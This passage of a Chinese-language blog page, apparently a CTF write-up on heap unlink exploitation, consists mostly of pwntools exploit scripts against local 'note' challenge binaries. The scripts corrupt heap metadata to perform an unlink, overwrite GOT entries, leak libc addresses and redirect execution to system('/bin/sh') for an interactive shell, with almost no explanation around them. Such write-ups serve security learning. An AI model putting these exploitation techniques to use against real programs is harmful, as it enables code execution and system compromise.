class="number">0x30</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">payload+=p64(<span class="number">0x30</span>)+p64(<span class="number">0x90</span>)</span><br><span class="line">edit(<span class="number">2</span>,<span class="built_in">len</span>(payload),payload)</span><br><span class="line"><span class="comment">#unlink</span></span><br><span class="line">free(<span class="number">3</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;OK\n&#x27;</span>)</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x8</span>+p64(elf.got[<span class="string">&#x27;free&#x27;</span>])+p64(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">payload1+=p64(elf.got[<span class="string">&#x27;atoi&#x27;</span>])</span><br><span class="line"></span><br><span class="line">edit(<span class="number">2</span>,<span class="built_in">len</span>(payload1),payload1)</span><br><span class="line"></span><br><span class="line">payload2=p64(elf.plt[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line">edit(<span class="number">0</span>,<span class="built_in">len</span>(payload2),payload2)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">puts_addr=u64(sh.recv().split(<span class="string">&#x27;\n&#x27;</span>)[<span class="number">0</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(puts_addr)</span><br><span class="line">libc_base=puts_addr-libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">system=libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh_addr=binsh_addr = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">payload3=p64(system)</span><br><span class="line">edit(<span class="number">2</span>,<span class="built_in">len</span>(payload3),payload3)</span><br><span class="line">sh.send(p64(binsh_addr))</span><br><span class="line">sh.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>下面是note2的脚本，和上面的例题差不多，都是绕过两个条件就行。布置好堆的情况就行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh=process(<span class="string">&#x27;./note2&#x27;</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">elf=ELF(<span class="string">&#x27;./note2&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;/lib/x86_64-linux-gnu/libc.so.6&quot;</span>)</span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">head=<span class="number">0x602120</span></span><br><span class="line"><span class="comment">#gdb.attach(sh,&#x27;b *0x400F6C&#x27;)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">init</span>(<span class="params">name,addr</span>):</span></span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input your name:&#x27;</span>)</span><br><span class="line">    sh.sendline(name)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input your address:&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">alloc</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the length of the note content:(less than 128)&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the note content:&#x27;</span>)</span><br><span class="line">    sh.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the id of the note:\n&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,choice,content</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the id of the note:\n&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;do you want to overwrite or append?[1.overwrite/2.append]&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(choice))</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;TheNewContents:&#x27;</span>)</span><br><span class="line">    sh.sendline(content)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Edit note success!&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    sh.sendline(<span class="string">&#x27;4&#x27;</span>)</span><br><span class="line">    sh.recvuntil(<span class="string">&#x27;Input the id of the note:\n&#x27;</span>)</span><br><span class="line">    sh.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">init(<span class="string">&#x27;rootzh&#x27;</span>,<span class="number">0x12</span>)</span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x8</span>+p64(<span class="number">0xa1</span>)+p64(head-<span class="number">0x18</span>)+p64(head-<span class="number">0x10</span>)+<span class="string">&#x27;a&#x27;</span>*<span class="number">0x60</span></span><br><span class="line">alloc(<span class="number">0x80</span>,payload)</span><br><span class="line">alloc(<span class="number">0</span>,<span class="string">&#x27;bbbbb&#x27;</span>)</span><br><span class="line">alloc(<span class="number">0x80</span>,<span class="string">&#x27;ccccc&#x27;</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>+p64(<span class="number">0xa0</span>)+p64(<span class="number">0x90</span>)</span><br><span class="line">alloc(<span class="number">0</span>,payload1)</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line">payload2=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(elf.got[<span class="string">&#x27;atoi&#x27;</span>])</span><br><span class="line">edit(<span class="number">0</span>,<span class="number">1</span>,payload2)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;Content is &#x27;</span>)</span><br><span class="line">atoi_addr=u64(sh.recvuntil(<span class="string">&#x27;\n&#x27;</span>,drop=<span class="literal">True</span>).ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(atoi_addr)</span><br><span class="line">libc_base=atoi_addr-libc.symbols[<span class="string">&#x27;atoi&#x27;</span>]</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(libc_base)</span><br><span class="line">system=libc_base+libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh=libc_base+<span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line">payload3=p64(system)</span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(system)</span><br><span class="line">edit(<span class="number">0</span>,<span class="number">1</span>,payload3)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;option---&gt;&gt;&#x27;</span>)</span><br><span class="line">sh.sendline(p64(binsh))</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>




    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/08/stack-chk-fail%E7%BB%95%E8%BF%87canary/" rel="prev" title="__stack_chk_fail绕过canary">
      <i class="fa fa-chevron-left"></i> __stack_chk_fail绕过canary
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/17/Fastbin-Attack/" rel="next" title="Fastbin Attack">
      Fastbin Attack <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#unlink%E5%88%A9%E7%94%A8"><span class="nav-number">1.</span> <span class="nav-text">unlink利用</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#unlink%E5%88%A9%E7%94%A8-1"><span class="nav-number">2.</span> <span class="nav-text">unlink利用</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">rootzhang</p>
  <div class="site-description" itemprop="description">我的博客</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rootzhang</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
